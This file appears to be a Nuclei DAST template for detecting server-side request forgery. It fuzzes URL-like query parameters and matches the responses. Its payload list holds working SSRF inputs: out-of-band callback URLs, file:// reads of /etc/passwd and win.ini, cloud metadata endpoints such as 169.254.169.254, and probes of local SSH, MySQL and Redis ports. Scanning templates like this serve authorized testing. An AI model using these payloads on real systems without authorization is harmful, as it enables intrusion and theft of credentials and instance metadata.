nuclei-templates/dast/vulnerabilities/ssrf/response-ssrf.yaml

135 lines
3.1 KiB
YAML
Raw Permalink Normal View History

2024-03-16 18:44:49 +00:00
id: response-ssrf
info:
name: Full Response SSRF Detection
2024-07-22 12:49:11 +00:00
author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
2024-03-16 18:44:49 +00:00
severity: high
reference:
- https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
metadata:
max-request: 12
2024-03-23 09:32:51 +00:00
tags: ssrf,dast
2024-03-16 18:44:49 +00:00
http:
2024-03-31 19:55:42 +00:00
- pre-condition:
2024-03-26 07:21:56 +00:00
- type: dsl
dsl:
- 'method == "GET"'
2024-03-16 18:44:49 +00:00
payloads:
ssrf:
- 'http://{{interactsh-url}}'
- 'http://{{FQDN}}.{{interactsh-url}}'
2024-07-22 12:49:11 +00:00
- 'http://{{FQDN}}@{{interactsh-url}}'
- 'http://{{interactsh-url}}#{{FQDN}}'
2024-03-16 18:44:49 +00:00
- 'http://{{RDN}}.{{interactsh-url}}'
2024-07-22 12:49:11 +00:00
- 'http://{{RDN}}@{{interactsh-url}}'
- 'http://{{interactsh-url}}#{{RDN}}'
2024-03-16 18:44:49 +00:00
- 'file:////./etc/./passwd'
- 'file:///c:/./windows/./win.ini'
- 'http://metadata.tencentyun.com/latest/meta-data/'
- 'http://100.100.100.200/latest/meta-data/'
- 'http://169.254.169.254/latest/meta-data/'
- 'http://169.254.169.254/metadata/v1'
- 'http://127.0.0.1:22'
- 'http://127.0.0.1:3306'
- 'dict://127.0.0.1:6379/info'
fuzzing:
- part: query
mode: single
keys:
- callback
- continue
- data
- dest
- dir
- domain
- feed
- file
- host
- html
- imgurl
- navigation
- next
- open
- out
- page
- path
- port
- redirect
- reference
- return
- show
- site
- to
- uri
- url
- val
- validate
- view
- window
fuzz:
- "{{ssrf}}"
- part: query
mode: single
values:
- "(https|http|file)(%3A%2F%2F|://)(.*?)"
fuzz:
- "{{ssrf}}"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Interactsh Server"
- type: regex
part: body
regex:
- 'SSH-(\d.\d)-OpenSSH_(\d.\d)'
- type: regex
part: body
regex:
- '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'
- type: regex
part: body
regex:
- '(\d.\d.\d)(.*?)mysql_native_password'
- type: regex
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
part: body
words:
- 'for 16-bit app support'
- type: regex
part: body
regex:
- 'dns-conf\/[\s\S]+instance\/'
- type: regex
part: body
regex:
- 'app-id[\s\S]+placement\/'
- type: regex
part: body
regex:
- 'ami-id[\s\S]+placement\/'
- type: regex
part: body
regex:
- 'id[\s\S]+interfaces\/'
# digest: 4a0a0047304502207f56832537811f8d9f528fa5af83d562549394d54ea74bfc72bf2889fec20c51022100e697d5acec83a478cb8f60b02e1c90a45ba3575c99b879749d01ed38b8ea8c48:922c64590222798bb761d5b6d8e72950